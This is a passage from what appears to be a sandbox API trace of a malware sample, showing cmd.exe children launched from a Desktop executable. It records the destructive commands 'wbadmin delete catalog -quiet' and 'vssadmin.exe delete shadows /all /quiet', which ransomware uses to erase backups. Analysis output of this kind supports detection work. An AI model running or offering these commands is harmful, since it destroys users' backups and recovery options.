[0099.430] GetProcessHeap () returned 0x230000 [0099.430] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xe8) returned 0x249e40 [0099.430] GetProcessHeap () returned 0x230000 [0099.430] RtlReAllocateHeap (Heap=0x230000, Flags=0x0, Ptr=0x249e40, Size=0x7e) returned 0x249e40 [0099.430] GetProcessHeap () returned 0x230000 [0099.430] RtlSizeHeap (HeapHandle=0x230000, Flags=0x0, MemoryPointer=0x249e40) returned 0x7e [0099.431] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.431] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x14ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef40) returned 0xffffffffffffffff [0099.431] GetLastError () returned 0x2 [0099.431] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wbadmin", fInfoLevelId=0x1, lpFindFileData=0x14ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef40) returned 0xffffffffffffffff [0099.432] GetLastError () returned 0x2 [0099.432] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0099.432] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.*", fInfoLevelId=0x1, lpFindFileData=0x14ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef40) returned 0x249ed0 [0099.432] GetProcessHeap () returned 0x230000 [0099.432] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x28) returned 0x244610 [0099.432] FindClose (in: hFindFile=0x249ed0 | out: hFindFile=0x249ed0) returned 1 [0099.432] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x14ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef40) returned 0xffffffffffffffff [0099.432] GetLastError () returned 0x2 [0099.432] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x14ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14ef40) returned 0x249ed0 [0099.432] GetProcessHeap () returned 0x230000 [0099.432] RtlReAllocateHeap (Heap=0x230000, Flags=0x0, Ptr=0x244610, Size=0x8) returned 0x248900 [0099.432] FindClose (in: hFindFile=0x249ed0 | out: hFindFile=0x249ed0) returned 1 [0099.432] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0099.432] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0099.432] GetConsoleTitleW (in: lpConsoleTitle=0x14f490, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\csrhdp.exe") returned 0x30 [0099.432] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f248, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f208 | out: lpAttributeList=0x14f248, lpSize=0x14f208) returned 1 [0099.432] UpdateProcThreadAttribute (in: lpAttributeList=0x14f248, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f248, lpPreviousValue=0x0) returned 1 [0099.432] GetStartupInfoW (in: lpStartupInfo=0x14f360 | out: lpStartupInfo=0x14f360*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0099.433] GetProcessHeap () returned 0x230000 [0099.433] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x20) returned 0x244610 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.433] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.434] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.434] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.434] GetProcessHeap () returned 0x230000 [0099.434] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x244610 | out: hHeap=0x230000) returned 1 [0099.434] GetProcessHeap () returned 0x230000 [0099.434] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x12) returned 0x249ed0 [0099.434] lstrcmpW (lpString1="\\wbadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0099.435] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbadmin.exe", lpCommandLine="wbadmin delete catalog -quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x14f280*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wbadmin delete catalog -quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f230 | out: lpCommandLine="wbadmin delete catalog -quiet", lpProcessInformation=0x14f230*(hProcess=0x54, hThread=0x50, dwProcessId=0x8a8, dwThreadId=0x8cc)) returned 1 [0100.194] CloseHandle (hObject=0x50) returned 1 [0100.194] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0100.194] GetProcessHeap () returned 0x230000 [0100.194] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24c230 | out: hHeap=0x230000) returned 1 [0100.194] GetEnvironmentStringsW () returned 0x24ac30* [0100.194] GetProcessHeap () returned 0x230000 [0100.194] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xae8) returned 0x24b720 [0100.194] FreeEnvironmentStringsW (penv=0x24ac30) returned 1 [0100.194] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0113.818] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x14f178 | out: lpExitCode=0x14f178*=0x0) returned 1 [0113.822] CloseHandle (hObject=0x54) returned 1 [0113.831] _vsnwprintf (in: _Buffer=0x14f3e8, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f188 | out: _Buffer="00000000") returned 8 [0113.837] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0113.846] GetProcessHeap () returned 0x230000 [0113.847] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b720 | out: hHeap=0x230000) returned 1 [0113.849] GetEnvironmentStringsW () returned 0x24ac30* [0113.852] GetProcessHeap () returned 0x230000 [0113.854] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb0e) returned 0x24b750 [0113.857] FreeEnvironmentStringsW (penv=0x24ac30) returned 1 [0113.859] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0113.860] GetProcessHeap () returned 0x230000 [0113.862] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24b750 | out: hHeap=0x230000) returned 1 [0113.863] GetEnvironmentStringsW () returned 0x24ac30* [0113.866] GetProcessHeap () returned 0x230000 [0113.868] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb0e) returned 0x24b750 [0113.871] FreeEnvironmentStringsW (penv=0x24ac30) returned 1 [0113.872] GetProcessHeap () returned 0x230000 [0113.874] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x249ed0 | out: hHeap=0x230000) returned 1 [0113.876] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f248 | out: lpAttributeList=0x14f248) [0113.877] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.880] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0113.894] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0113.900] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.900] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0113.904] SetConsoleInputExeNameW () returned 0x1 [0113.905] GetConsoleOutputCP () returned 0x1b5 [0113.907] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0113.909] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.970] exit (_Code=0) Process: id = "6" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6cfd6000" os_pid = "0x738" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "/C vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 28 os_tid = 0x534 [0099.216] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af880 | out: lpSystemTimeAsFileTime=0x2af880*(dwLowDateTime=0x8f251150, dwHighDateTime=0x1d5956e)) [0099.216] GetCurrentProcessId () returned 0x738 [0099.216] GetCurrentThreadId () returned 0x534 [0099.216] GetTickCount () returned 0x1152ece [0099.216] QueryPerformanceCounter (in: lpPerformanceCount=0x2af888 | out: lpPerformanceCount=0x2af888*=21950086814) returned 1 [0099.217] GetModuleHandleW (lpModuleName=0x0) returned 0x4acb0000 [0099.217] __set_app_type (_Type=0x1) [0099.217] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4acd7810) returned 0x0 [0099.217] __getmainargs (in: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610, _DoWildCard=0, _StartInfo=0x4acde0f4 | out: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610) returned 0 [0099.218] GetCurrentThreadId () returned 0x534 [0099.218] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x534) returned 0x3c [0099.218] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.218] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0099.218] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.218] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.218] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af818 | out: phkResult=0x2af818*=0x0) returned 0x2 [0099.218] VirtualQuery (in: lpAddress=0x2af800, lpBuffer=0x2af780, dwLength=0x30 | out: lpBuffer=0x2af780*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.219] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af780, dwLength=0x30 | out: lpBuffer=0x2af780*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.219] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af780, dwLength=0x30 | out: lpBuffer=0x2af780*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.219] VirtualQuery (in: lpAddress=0x1b4000, lpBuffer=0x2af780, dwLength=0x30 | out: lpBuffer=0x2af780*(BaseAddress=0x1b4000, AllocationBase=0x1b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.219] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af780, dwLength=0x30 | out: lpBuffer=0x2af780*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.219] GetConsoleOutputCP () returned 0x1b5 [0099.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.219] SetConsoleCtrlHandler (HandlerRoutine=0x4acd3184, Add=1) returned 1 [0099.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0099.220] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.220] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.220] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.220] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0099.220] GetEnvironmentStringsW () returned 0x44aa50* [0099.220] GetProcessHeap () returned 0x430000 [0099.220] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa7c) returned 0x44b4e0 [0099.220] FreeEnvironmentStringsW (penv=0x44aa50) returned 1 [0099.220] GetProcessHeap () returned 0x430000 [0099.220] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x8) returned 0x44bf70 [0099.220] GetEnvironmentStringsW () returned 0x44aa50* [0099.220] GetProcessHeap () returned 0x430000 [0099.220] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa7c) returned 0x44bf90 [0099.220] FreeEnvironmentStringsW (penv=0x44aa50) returned 1 [0099.221] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae6d8 | out: phkResult=0x2ae6d8*=0x44) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x0, lpData=0x2ae6f0*=0x18, lpcbData=0x2ae6d4*=0x1000) returned 0x2 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x1, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x0, lpData=0x2ae6f0*=0x1, lpcbData=0x2ae6d4*=0x1000) returned 0x2 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x0, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x40, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x40, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x0, lpData=0x2ae6f0*=0x40, lpcbData=0x2ae6d4*=0x1000) returned 0x2 [0099.221] RegCloseKey (hKey=0x44) returned 0x0 [0099.221] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae6d8 | out: phkResult=0x2ae6d8*=0x44) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x0, lpData=0x2ae6f0*=0x40, lpcbData=0x2ae6d4*=0x1000) returned 0x2 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x1, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.221] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x0, lpData=0x2ae6f0*=0x1, lpcbData=0x2ae6d4*=0x1000) returned 0x2 [0099.222] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x0, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.222] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x9, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.222] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x4, lpData=0x2ae6f0*=0x9, lpcbData=0x2ae6d4*=0x4) returned 0x0 [0099.222] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae6d0, lpData=0x2ae6f0, lpcbData=0x2ae6d4*=0x1000 | out: lpType=0x2ae6d0*=0x0, lpData=0x2ae6f0*=0x9, lpcbData=0x2ae6d4*=0x1000) returned 0x2 [0099.222] RegCloseKey (hKey=0x44) returned 0x0 [0099.222] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc41ad7 [0099.222] srand (_Seed=0x5dc41ad7) [0099.222] GetCommandLineW () returned="/C vssadmin.exe delete shadows /all /quiet" [0099.222] GetCommandLineW () returned="/C vssadmin.exe delete shadows /all /quiet" [0099.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.222] GetProcessHeap () returned 0x430000 [0099.222] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x218) returned 0x44ca20 [0099.222] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44ca30, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.222] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.222] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.223] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.223] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.223] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.223] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.223] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.223] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.223] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.223] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.223] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.223] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.223] GetProcessHeap () returned 0x430000 [0099.223] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x44b4e0 | out: hHeap=0x430000) returned 1 [0099.223] GetEnvironmentStringsW () returned 0x44aa50* [0099.223] GetProcessHeap () returned 0x430000 [0099.223] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0xa94) returned 0x44cc40 [0099.223] FreeEnvironmentStringsW (penv=0x44aa50) returned 1 [0099.223] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.223] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.223] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.223] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.223] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.223] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.223] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.223] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.223] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.223] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.223] GetProcessHeap () returned 0x430000 [0099.223] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x8, Size=0x5c) returned 0x448300 [0099.223] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af4e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.224] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2af4e0, lpFilePart=0x2af4c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2af4c0*="Desktop") returned 0x25 [0099.224] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.224] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af1f0 | out: lpFindFileData=0x2af1f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x4499a0 [0099.224] FindClose (in: hFindFile=0x4499a0 | out: hFindFile=0x4499a0) returned 1 [0099.224] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2af1f0 | out: lpFindFileData=0x2af1f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 